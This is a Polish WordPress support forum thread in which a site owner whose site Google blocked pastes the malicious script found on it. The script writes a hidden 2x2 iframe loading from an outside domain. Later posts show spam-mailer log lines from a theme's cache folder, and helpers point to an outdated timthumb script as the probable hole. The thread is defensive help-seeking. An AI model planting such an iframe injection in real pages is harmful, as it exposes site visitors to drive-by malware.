Wsparcie » Zaawansowane » Złośliwe oprogramowanie

  • Rozwiązany Pysio

    (@pysio)


    Cześć,
    google zablokowało moją stronę ponieważ odkryli złośliwy kod ma mojej stronie. W szczegółach znalazłem go. Wygląda on tak:

    <script type="text/javascript">
    document.write('<iframe src="http://poseyhumane.org/stats.ph
    p" name="Twitter" scrolling="auto" frameborder="no" align="c
    enter" height="2" width="2"></iframe>');
    </script>

    Czy ktoś może mi w jakiś sposób podpowiedzieć jak znaleźć ten kod w stercie innych kodów? Gdzie go szukać? Podejrzewam, że zadomowił się w folderze wp-content ale nie wiem gdzie go dalej szukać.

Viewing 5 replies - 31 through 35 (of 35 total)
  • I znowu to samo, powoli mam dosyc WP.:

    2013-03-14 15:10:41 cwd=/home/users/carol/public_html/c/wp-content/themes/specere/inc/cache 3 args: /usr/sbin/sendmail -t -i

    2013-03-14 15:11:06 cwd=/home/users/carol/public_html/c/wp-content/themes 3 args: /usr/sbin/sendmail -t -i

    POMOCY

    Nie wiem jakiej pomocy oczekujesz. m.in. w tym temacie zostały opisane metody usuwania infekcji …a jeżeli mimo to nie potrafisz samodzielnie sobie poradzić z oczyszczeniem i zabezpieczeniem wordpressa, to może wypadało by zlecić to komuś?

    Mogę jedynie zgadywać, że ten motyw (przynajmniej w wersji z której korzystasz) korzysta ze starszego wydania skryptu timthumb – i to może być furtka otwierająca drogę do infekcji. W takim wypadku poza samym oczyszczeniem trzeba by zaktualizować i zabezpieczyć timthumba oraz wykasować jego cache – to absolutne minimum.
    No ale to są tylko sugestie i zgadywanki …tego typu problemów nie da się ot tak rozwiązać przez forum jeżeli jeżeli posiadasz wiedzy i umiejętności by wyciągnąć odpowiednie wnioski i zastosować to w praktyce.

    A jak zaktualizowac timthumba ? Bo z poziomu panelu administracyjnego WP chyba tego nie da rady zrobic ?

    Najdziwniejsze jest to ,ze gdy korzystalem z innego serwera niestety duzo drozszego, takie wlamania nie mialy miejsca.

    Tutaj masz zawsze aktualną wersję. Podmieniasz sobie przez FTP.

Viewing 5 replies - 31 through 35 (of 35 total)
  • The topic ‘Złośliwe oprogramowanie’ is closed to new replies.